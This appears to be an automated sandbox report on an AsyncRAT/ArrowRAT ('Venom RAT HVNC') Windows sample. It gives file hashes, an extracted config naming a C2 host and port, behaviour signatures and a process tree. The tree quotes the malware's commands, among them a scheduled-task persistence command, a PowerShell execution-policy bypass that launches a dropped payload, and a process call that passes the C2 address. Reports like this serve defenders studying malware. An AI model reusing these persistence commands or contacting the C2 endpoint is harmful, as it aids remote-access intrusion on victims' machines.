Analysis

  • max time kernel
    1200s
  • max time network
    1200s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    18-07-2023 10:49

General

  • Target

    JKKHJKHJKHJ.exe

  • Size

    63KB

  • MD5

    36a2e6b4dea8833ac9642279cc0f2f51

  • SHA1

    c646179ba316daabb09406d3705a4f4248b5e0a9

  • SHA256

    870a1845baec61018280036e11dc9bdea8de069760fe0a713395c6258a496e61

  • SHA512

    27eb6c352ccb66de04a45b1961e872a6c4a1e88faedd8480c81e319bc8c9c63ff48849b8fbba05efc21d64d1b79f761442f5a765b2e40fe5b28c1c860fe16602

  • SSDEEP

    768:Ns02C46poI3iPgqUiz9JmoAk25GV6iB1+E0Smv7mqb2ntpwH1obC9johPGKDpqKX:nEIoRp2erBlibbwwAGKDpqKmY7

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

wasted9sss1-57562.portmap.host:57562

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    true

  • install_file

    BBN BNMBN.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

arrowrat

Botnet

VenomHVNC

C2

wasted9sss1-57562.portmap.host:57562

Mutex

uSzDNutNI.exe

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Async RAT payload 6 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JKKHJKHJKHJ.exe
    "C:\Users\Admin\AppData\Local\Temp\JKKHJKHJKHJ.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "BBN BNMBN" /tr '"C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "BBN BNMBN" /tr '"C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:1528
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpF872.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:916
      • C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe
        "C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2320
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2016
            • C:\Users\Admin\AppData\Local\Temp\ClientH.exe
              "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
              6⤵
              • Modifies WinLogon for persistence
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1976
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                7⤵
                • Modifies Installed Components in the registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  8⤵
                    PID:824
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC wasted9sss1-57562.portmap.host 57562 uSzDNutNI.exe
                  7⤵
                    PID:1416
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x454
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1900

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Cab1067.tmp

        Filesize

        62KB

        MD5

        3ac860860707baaf32469fa7cc7c0192

        SHA1

        c33c2acdaba0e6fa41fd2f00f186804722477639

        SHA256

        d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

        SHA512

        d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

      • C:\Users\Admin\AppData\Local\Temp\ClientH.exe

        Filesize

        90KB

        MD5

        5ac5cf4a09a5c6dfd82669a0e24f675d

        SHA1

        4f0993bfd2245da594000bb7c2d2bd7d02b60d53

        SHA256

        6136b0b9b28b52962f090cdf34ac650c4b184f3a65e863e2051cdc1219aff051

        SHA512

        e0317cf9a5a495f5e90a88f4a96517626a30c016b7374db41bc79a8bcb0920fcf7691ca3cf48c712b8bc2db075d734ca7cacc771e8f604297600187afe314d3f

      • C:\Users\Admin\AppData\Local\Temp\ClientH.exe

        Filesize

        90KB

        MD5

        5ac5cf4a09a5c6dfd82669a0e24f675d

        SHA1

        4f0993bfd2245da594000bb7c2d2bd7d02b60d53

        SHA256

        6136b0b9b28b52962f090cdf34ac650c4b184f3a65e863e2051cdc1219aff051

        SHA512

        e0317cf9a5a495f5e90a88f4a96517626a30c016b7374db41bc79a8bcb0920fcf7691ca3cf48c712b8bc2db075d734ca7cacc771e8f604297600187afe314d3f

      • C:\Users\Admin\AppData\Local\Temp\Tar3326.tmp

        Filesize

        164KB

        MD5

        4ff65ad929cd9a367680e0e5b1c08166

        SHA1

        c0af0d4396bd1f15c45f39d3b849ba444233b3a2

        SHA256

        c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

        SHA512

        f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

      • C:\Users\Admin\AppData\Local\Temp\tmpF872.tmp.bat

        Filesize

        153B

        MD5

        f16e4923376d2a6db951cf5d08196cb0

        SHA1

        a533dad57c6ba36422beafc7e3037e6dc231dd07

        SHA256

        7608e2c6380afc029085b0397c92e6901c1955bec0cc027c20194887a556d314

        SHA512

        e5fa0059ad5fded6e99ea8266bad68da1db3273c7cb06410bf477bd4572ed83073bf89b7e09317c07d1f8d8ff837180089aa07abde3623e59381d2f8ee251646

      • C:\Users\Admin\AppData\Local\Temp\tmpF872.tmp.bat

        Filesize

        153B

        MD5

        f16e4923376d2a6db951cf5d08196cb0

        SHA1

        a533dad57c6ba36422beafc7e3037e6dc231dd07

        SHA256

        7608e2c6380afc029085b0397c92e6901c1955bec0cc027c20194887a556d314

        SHA512

        e5fa0059ad5fded6e99ea8266bad68da1db3273c7cb06410bf477bd4572ed83073bf89b7e09317c07d1f8d8ff837180089aa07abde3623e59381d2f8ee251646

      • C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe

        Filesize

        63KB

        MD5

        36a2e6b4dea8833ac9642279cc0f2f51

        SHA1

        c646179ba316daabb09406d3705a4f4248b5e0a9

        SHA256

        870a1845baec61018280036e11dc9bdea8de069760fe0a713395c6258a496e61

        SHA512

        27eb6c352ccb66de04a45b1961e872a6c4a1e88faedd8480c81e319bc8c9c63ff48849b8fbba05efc21d64d1b79f761442f5a765b2e40fe5b28c1c860fe16602

      • C:\Users\Admin\AppData\Roaming\BBN BNMBN.exe

        Filesize

        63KB

        MD5

        36a2e6b4dea8833ac9642279cc0f2f51

        SHA1

        c646179ba316daabb09406d3705a4f4248b5e0a9

        SHA256

        870a1845baec61018280036e11dc9bdea8de069760fe0a713395c6258a496e61

        SHA512

        27eb6c352ccb66de04a45b1961e872a6c4a1e88faedd8480c81e319bc8c9c63ff48849b8fbba05efc21d64d1b79f761442f5a765b2e40fe5b28c1c860fe16602

      • memory/1416-135-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

        Filesize

        4KB

      • memory/1416-167-0x0000000000FF0000-0x0000000001030000-memory.dmp

        Filesize

        256KB

      • memory/1416-145-0x0000000000FF0000-0x0000000001030000-memory.dmp

        Filesize

        256KB

      • memory/1416-144-0x0000000073C20000-0x000000007430E000-memory.dmp

        Filesize

        6.9MB

      • memory/1416-131-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1416-166-0x0000000073C20000-0x000000007430E000-memory.dmp

        Filesize

        6.9MB

      • memory/1416-139-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1416-142-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1416-137-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1416-132-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1416-133-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1416-134-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

      • memory/1800-168-0x0000000003F60000-0x0000000003F61000-memory.dmp

        Filesize

        4KB

      • memory/1800-146-0x0000000003F60000-0x0000000003F61000-memory.dmp

        Filesize

        4KB

      • memory/1800-172-0x0000000003ED0000-0x0000000003EE0000-memory.dmp

        Filesize

        64KB

      • memory/1976-143-0x0000000073C20000-0x000000007430E000-memory.dmp

        Filesize

        6.9MB

      • memory/1976-130-0x0000000073C20000-0x000000007430E000-memory.dmp

        Filesize

        6.9MB

      • memory/1976-129-0x00000000001E0000-0x00000000001FC000-memory.dmp

        Filesize

        112KB

      • memory/2016-124-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2016-118-0x000000001B270000-0x000000001B552000-memory.dmp

        Filesize

        2.9MB

      • memory/2016-128-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

        Filesize

        9.6MB

      • memory/2016-125-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2016-123-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2016-122-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

        Filesize

        9.6MB

      • memory/2016-121-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2016-120-0x000007FEECCB0000-0x000007FEED64D000-memory.dmp

        Filesize

        9.6MB

      • memory/2016-119-0x0000000002410000-0x0000000002418000-memory.dmp

        Filesize

        32KB

      • memory/2148-68-0x0000000076EF0000-0x0000000077099000-memory.dmp

        Filesize

        1.7MB

      • memory/2148-54-0x000007FEF4C30000-0x000007FEF561C000-memory.dmp

        Filesize

        9.9MB

      • memory/2148-66-0x000007FEF4C30000-0x000007FEF561C000-memory.dmp

        Filesize

        9.9MB

      • memory/2148-57-0x0000000076EF0000-0x0000000077099000-memory.dmp

        Filesize

        1.7MB

      • memory/2148-56-0x000000001B000000-0x000000001B080000-memory.dmp

        Filesize

        512KB

      • memory/2148-55-0x0000000000840000-0x0000000000856000-memory.dmp

        Filesize

        88KB

      • memory/2320-94-0x0000000000B30000-0x0000000000B3E000-memory.dmp

        Filesize

        56KB

      • memory/2320-92-0x0000000076EF0000-0x0000000077099000-memory.dmp

        Filesize

        1.7MB

      • memory/2320-91-0x000007FEF4240000-0x000007FEF4C2C000-memory.dmp

        Filesize

        9.9MB

      • memory/2320-74-0x0000000076EF0000-0x0000000077099000-memory.dmp

        Filesize

        1.7MB

      • memory/2320-73-0x000007FEF4240000-0x000007FEF4C2C000-memory.dmp

        Filesize

        9.9MB

      • memory/2320-72-0x0000000000F90000-0x0000000000FA6000-memory.dmp

        Filesize

        88KB

      • memory/2320-147-0x0000000000B50000-0x0000000000B60000-memory.dmp

        Filesize

        64KB